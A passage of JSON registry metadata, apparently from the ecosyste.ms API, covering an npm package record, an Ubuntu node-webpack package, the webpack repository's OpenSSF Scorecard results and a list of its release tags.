pi/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":425,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":86,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpaaoock/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpaaoock/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpaaoock/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpaaoock/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpaaoock/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/webpaaoock/codemeta","maintainers":[{"uuid":"alexchenleon","login":"alexchenleon","name":null,"email":"alexchenleon@proton.me","url":null,"packages_count":2,"html_url":"https://www.npmjs.com/~alexchenleon","role":null,"created_at":"2022-11-10T21:19:38.508Z","updated_at":"2022-11-10T21:19:38.508Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/alexchenleon/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5816876,"maintainers_count":1245095,"namespaces_count":426640,"keywords_count":889778,"github":"npm","metadata":{"funded_packages_count":192526,"rate_limit":2},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-09-02T05:02:10.244Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":13744960,"name":"node-webpack","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/webpack/webpack","licenses":"mit","normalized_licenses":[],"repository_url":"https://github.com/webpack/webpack","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-13T05:50:34.683Z","latest_release_published_at":"2026-02-13T05:50:34.683Z","latest_release_number":"4.30.0-9","last_synced_at":"2026-03-13T18:30:19.057Z","created_at":"2026-02-13T05:50:34.489Z","updated_at":"2026-08-25T07:10:53.897Z","registry_url":"https://launchpad.net/ubuntu/+source/node-webpack","install_command":"apt-get install node-webpack","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"webpack","standards_version":"4.5.0","maintainer":"Debian Javascript Maintainers \u003cpkg-javascript-devel@lists.alioth.debian.org\u003e","build_depends":"debhelper-compat (= 12), nodejs, pkg-js-tools (\u003e= 0.8.4~), node-sinon \u003c!nocheck\u003e, node-acorn (\u003e= 6.0~) \u003c!nocheck\u003e, node-ajv (\u003e= 6.1~) \u003c!nocheck\u003e, node-ajv-keywords (\u003e= 3.1~) \u003c!nocheck\u003e, node-chrome-trace-event \u003c!nocheck\u003e, node-enhanced-resolve (\u003e= 4.0~) \u003c!nocheck\u003e, node-loader-runner \u003c!nocheck\u003e, node-loader-utils (\u003e= 1.1~) \u003c!nocheck\u003e, node-memory-fs \u003c!nocheck\u003e, node-micromatch \u003c!nocheck\u003e, node-mkdirp \u003c!nocheck\u003e, node-neo-async \u003c!nocheck\u003e, node-libs-browser \u003c!nocheck\u003e, node-schema-utils (\u003e= 0.4.2~) \u003c!nocheck\u003e, node-tapable (\u003e= 1.0~) \u003c!nocheck\u003e, node-uglifyjs-webpack-plugin (\u003e= 1.3.0-4~) \u003c!nocheck\u003e, node-watchpack (\u003e= 1.4~) \u003c!nocheck\u003e, node-webpack-sources \u003c!nocheck\u003e, node-resolve-cwd \u003c!nocheck\u003e, node-interpret \u003c!nocheck\u003e, node-findup-sync \u003c!nocheck\u003e, node-supports-color \u003c!nocheck\u003e, node-yargs \u003c!nocheck\u003e, node-estraverse \u003c!nocheck\u003e, node-esrecurse \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"